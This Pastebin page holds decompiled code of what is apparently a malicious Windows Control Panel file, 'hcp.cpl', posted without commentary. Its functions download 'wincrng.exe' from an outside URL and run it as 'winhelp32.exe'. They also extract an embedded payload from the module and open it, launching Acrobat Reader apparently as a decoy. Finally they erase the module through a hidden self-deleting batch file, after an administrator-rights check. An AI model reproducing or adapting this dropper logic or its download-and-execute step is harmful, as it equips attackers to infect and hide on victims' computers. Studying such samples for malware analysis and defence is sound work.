SHARE
TWEET

hcp.cpl decompiled

a guest Sep 17th, 2010 481 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. //----- (100010B0) --------------------------------------------------------
  2. int __cdecl MakeAndShowEgg()
  3. {
  4.   _UNKNOWN *v0; // eax@1
  5.   HANDLE v1; // esi@1
  6.   HANDLE v2; // ebp@1
  7.   void *v3; // edi@1
  8.   int result; // eax@5
  9.   DWORD nNumberOfBytesToWrite; // [sp+10h] [bp-2C4h]@1
  10.   LPCSTR lpApplicationName; // [sp+14h] [bp-2C0h]@3
  11.   HKEY hKey; // [sp+18h] [bp-2BCh]@1
  12.   DWORD NumberOfBytesRead; // [sp+1Ch] [bp-2B8h]@1
  13.   DWORD cbData; // [sp+20h] [bp-2B4h]@2
  14.   char v10; // [sp+24h] [bp-2B0h]@1
  15.   int v11; // [sp+28h] [bp-2ACh]@1
  16.   int v12; // [sp+2Ch] [bp-2A8h]@5
  17.   DWORD NumberOfBytesWritten; // [sp+30h] [bp-2A4h]@1
  18.   DWORD Type; // [sp+34h] [bp-2A0h]@2
  19.   struct _STARTUPINFOA StartupInfo; // [sp+38h] [bp-29Ch]@3
  20.   struct _PROCESS_INFORMATION ProcessInformation; // [sp+7Ch] [bp-258h]@3
  21.   char Buffer; // [sp+8Ch] [bp-248h]@1
  22.   CHAR FileName; // [sp+CCh] [bp-208h]@1
  23.   BYTE Data; // [sp+1D0h] [bp-104h]@2
  24.  
  25.   v0 = sub_10001A0D();
  26.   AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v11, v0);
  27.   GetModuleFileNameA((HMODULE)0x10000000, &FileName, 0x104u);
  28.   v1 = CreateFileA(&FileName, -2147483648u, 0, 0, 3u, 0, 0);
  29.   SetFilePointer(v1, 1024, 0, 0);
  30.   ReadFile(v1, &Buffer, 64u, &NumberOfBytesRead, 0);
  31.   SetFilePointer(v1, 1088, 0, 0);
  32.   ReadFile(v1, &nNumberOfBytesToWrite, 4u, &NumberOfBytesRead, 0);
  33.   v2 = CreateFileA(&Buffer, 0x40000000u, 0, 0, 2u, 0, 0);
  34.   SetFilePointer(v1, 24576, 0, 0);
  35.   v3 = operator new(nNumberOfBytesToWrite);
  36.   ReadFile(v1, v3, nNumberOfBytesToWrite, &NumberOfBytesRead, 0);
  37.   WriteFile(v2, v3, nNumberOfBytesToWrite, &NumberOfBytesWritten, 0);
  38.   CloseHandle(v2);
  39.   operator delete(v3);
  40.   CloseHandle(v1);
  41.   ShellExecuteA(0, "open", &Buffer, 0, 0, 1);
  42.   CString__CString(&v10);
  43.   if ( !RegOpenKeyExA(
  44.           HKEY_LOCAL_MACHINE,
  45.           "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\AcroRd32.exe",
  46.           0,
  47.           0x20019u,
  48.           &hKey) )
  49.   {
  50.     cbData = 260;
  51.     if ( !RegQueryValueExA(hKey, ValueName, 0, &Type, &Data, &cbData) )
  52.     {
  53.       CString__CString(&lpApplicationName);
  54.       CString__Format(&lpApplicationName, (const char *)&unk_10003020, &Data);
  55.       memset(&StartupInfo, 0, sizeof(StartupInfo));
  56.       StartupInfo.cb = 68;
  57.       StartupInfo.dwFlags = 1;
  58.       StartupInfo.wShowWindow = 5;
  59.       CreateProcessA(lpApplicationName, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation);
  60.       CString___CString(&lpApplicationName);
  61.     }
  62.     RegCloseKey(hKey);
  63.   }
  64.   CString___CString(&v10);
  65.   result = v12;
  66.   *(_DWORD *)(v12 + 4) = v11;
  67.   return result;
  68. }
  69.  
  70. //----- (100012E0) --------------------------------------------------------
  71. char __cdecl IsAdmin()
  72. {
  73.   _UNKNOWN *v0; // eax@1
  74.   HANDLE v1; // eax@1
  75.   HANDLE v2; // eax@3
  76.   char result; // al@4
  77.   int v4; // eax@9
  78.   void *v5; // esp@9
  79.   unsigned int v6; // edi@15
  80.   PSID *v7; // ebx@16
  81.   char v8; // [sp+0h] [bp-2Ch]@9
  82.   char v9; // [sp+4h] [bp-28h]@16
  83.   int v10; // [sp+Ch] [bp-20h]@1
  84.   int v11; // [sp+10h] [bp-1Ch]@4
  85.   struct _SID_IDENTIFIER_AUTHORITY pIdentifierAuthority; // [sp+14h] [bp-18h]@1
  86.   PSID pSid; // [sp+1Ch] [bp-10h]@13
  87.   DWORD ReturnLength; // [sp+20h] [bp-Ch]@5
  88.   HANDLE TokenHandle; // [sp+24h] [bp-8h]@1
  89.   char v16; // [sp+2Bh] [bp-1h]@15
  90.  
  91.   v0 = sub_10001A0D();
  92.   AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v10, v0);
  93.   pIdentifierAuthority.Value[0] = 0;
  94.   pIdentifierAuthority.Value[1] = 0;
  95.   pIdentifierAuthority.Value[2] = 0;
  96.   pIdentifierAuthority.Value[3] = 0;
  97.   pIdentifierAuthority.Value[4] = 0;
  98.   pIdentifierAuthority.Value[5] = 5;
  99.   v1 = GetCurrentThread();
  100.   if ( !OpenThreadToken(v1, 8u, 0, &TokenHandle) )
  101.   {
  102.     if ( GetLastError() != 1008 )
  103.     {
  104. LABEL_12:
  105.       result = 0;
  106.       *(_DWORD *)(v11 + 4) = v10;
  107.       return result;
  108.     }
  109.     v2 = GetCurrentProcess();
  110.     if ( !OpenProcessToken(v2, 8u, &TokenHandle) )
  111.     {
  112.       *(_DWORD *)(v11 + 4) = v10;
  113.       return 0;
  114.     }
  115.   }
  116.   if ( GetTokenInformation(TokenHandle, TokenGroups, 0, 0, &ReturnLength) )
  117.   {
  118.     *(_DWORD *)(v11 + 4) = v10;
  119.     return 0;
  120.   }
  121.   if ( GetLastError() != 122 )
  122.   {
  123.     result = 0;
  124.     *(_DWORD *)(v11 + 4) = v10;
  125.     return result;
  126.   }
  127.   v4 = ReturnLength + 3;
  128.   LOBYTE(v4) = (ReturnLength + 3) & 0xFC;
  129.   v5 = alloca(v4);
  130.   if ( !&v8 )
  131.   {
  132.     *(_DWORD *)(v11 + 4) = v10;
  133.     return 0;
  134.   }
  135.   if ( !GetTokenInformation(TokenHandle, TokenGroups, &v8, ReturnLength, &ReturnLength) )
  136.     goto LABEL_12;
  137.   if ( AllocateAndInitializeSid(&pIdentifierAuthority, 2u, 0x20u, 0x220u, 0, 0, 0, 0, 0, 0, &pSid) )
  138.   {
  139.     v6 = 0;
  140.     v16 = 0;
  141.     if ( *(_DWORD *)&v8 )
  142.     {
  143.       v7 = (PSID *)&v9;
  144.       while ( !EqualSid(*v7, pSid) )
  145.       {
  146.         ++v6;
  147.         v7 += 2;
  148.         if ( v6 >= *(_DWORD *)&v8 )
  149.           goto LABEL_21;
  150.       }
  151.       v16 = 1;
  152.     }
  153. LABEL_21:
  154.     FreeSid(pSid);
  155.     result = v16;
  156.     *(_DWORD *)(v11 + 4) = v10;
  157.   }
  158.   else
  159.   {
  160.     *(_DWORD *)(v11 + 4) = v10;
  161.     result = 0;
  162.   }
  163.   return result;
  164. }
  165.  
  166. //----- (10001490) --------------------------------------------------------
  167. int __cdecl DeleteMyself()
  168. {
  169.   signed int v0; // ecx@1
  170.   int v1; // edi@1
  171.   _UNKNOWN *v2; // eax@1
  172.   char v3; // zf@3
  173.   signed int v4; // ecx@5
  174.   signed int v5; // ecx@5
  175.   unsigned int v6; // ebx@5
  176.   CHAR *v7; // edi@5
  177.   const void *v8; // esi@5
  178.   char v9; // zf@7
  179.   HANDLE v10; // esi@9
  180.   int v11; // eax@10
  181.   HANDLE v12; // eax@11
  182.   HANDLE v13; // eax@11
  183.   int result; // eax@12
  184.   int v15; // [sp+Ch] [bp-650h]@1
  185.   int v16; // [sp+10h] [bp-64Ch]@12
  186.   struct _PROCESS_INFORMATION ProcessInformation; // [sp+14h] [bp-648h]@10
  187.   DWORD NumberOfBytesWritten; // [sp+24h] [bp-638h]@10
  188.   struct _STARTUPINFOA StartupInfo; // [sp+28h] [bp-634h]@10
  189.   CHAR FileName; // [sp+6Ch] [bp-5F0h]@1
  190.   CHAR String2; // [sp+170h] [bp-4ECh]@1
  191.   CHAR String; // [sp+274h] [bp-3E8h]@10
  192.  
  193.   v2 = sub_10001A0D();
  194.   AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v15, v2);
  195.   GetModuleFileNameA((HMODULE)0x10000000, &String2, 0x104u);
  196.   lstrcpyA(&FileName, &String2);
  197.   *strrchr(&FileName, 92) = 0;
  198.   v1 = (int)"\\DMS.bat";
  199.   v0 = -1;
  200.   do
  201.   {
  202.     if ( !v0 )
  203.       break;
  204.     v3 = *(_BYTE *)v1++ == 0;
  205.     --v0;
  206.   }
  207.   while ( !v3 );
  208.   v5 = ~v0;
  209.   v8 = (const void *)(v1 - v5);
  210.   v6 = v5;
  211.   v7 = &FileName;
  212.   v4 = -1;
  213.   do
  214.   {
  215.     if ( !v4 )
  216.       break;
  217.     v9 = *v7++ == 0;
  218.     --v4;
  219.   }
  220.   while ( !v9 );
  221.   memcpy(v7 - 1, v8, v6);
  222.   v10 = CreateFileA(&FileName, 0x40000000u, 0, 0, 2u, 0x8000080u, 0);
  223.   if ( v10 != (HANDLE)-1 )
  224.   {
  225.     wsprintfA(
  226.       &String,
  227.       ":Repeat\r\nDEL \"%s\"\r\nif exist \"%s\" goto Repeat\r\nDEL \"%s\"\r\n",
  228.       &String2,
  229.       &String2,
  230.       &FileName);
  231.     v11 = lstrlenA(&String);
  232.     WriteFile(v10, &String, v11, &NumberOfBytesWritten, 0);
  233.     CloseHandle(v10);
  234.     memset(&StartupInfo, 0, sizeof(StartupInfo));
  235.     StartupInfo.wShowWindow = 0;
  236.     StartupInfo.cb = 68;
  237.     StartupInfo.dwFlags = 1;
  238.     if ( CreateProcessA(0, &FileName, 0, 0, 0, 0x44u, 0, L"\\", &StartupInfo, &ProcessInformation) )
  239.     {
  240.       SetThreadPriority(ProcessInformation.hThread, -15);
  241.       v12 = GetCurrentThread();
  242.       SetThreadPriority(v12, 15);
  243.       v13 = GetCurrentProcess();
  244.       SetPriorityClass(v13, 0x80u);
  245.       CloseHandle(ProcessInformation.hProcess);
  246.       ResumeThread(ProcessInformation.hThread);
  247.       CloseHandle(ProcessInformation.hThread);
  248.     }
  249.   }
  250.   GetLastError();
  251.   PostQuitMessage(0);
  252.   result = v16;
  253.   *(_DWORD *)(v16 + 4) = v15;
  254.   return result;
  255. }
  256.  
  257. //----- (100017A0) --------------------------------------------------------
  258. char __cdecl StartUp()
  259. {
  260.   _UNKNOWN *v0; // eax@1
  261.   int v2; // [sp+0h] [bp-10Ch]@1
  262.   int v3; // [sp+4h] [bp-108h]@3
  263.   CHAR PathName; // [sp+8h] [bp-104h]@1
  264.  
  265.   v0 = sub_10001A0D();
  266.   AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v2, v0);
  267.   SHGetSpecialFolderPathA(0, &PathName, 26, 0);
  268.   SetCurrentDirectoryA(&PathName);
  269.   if ( (unsigned __int8)DownloadFile("winhelp32.exe", (int)"http://academyhouse.us/from/wincrng.exe") )
  270.     WinExec("winhelp32.exe", 5u);
  271.   MakeAndShowEgg();
  272.   DeleteMyself();
  273.   *(_DWORD *)(v3 + 4) = v2;
  274.   return 1;
  275. }
RAW Paste Data
Top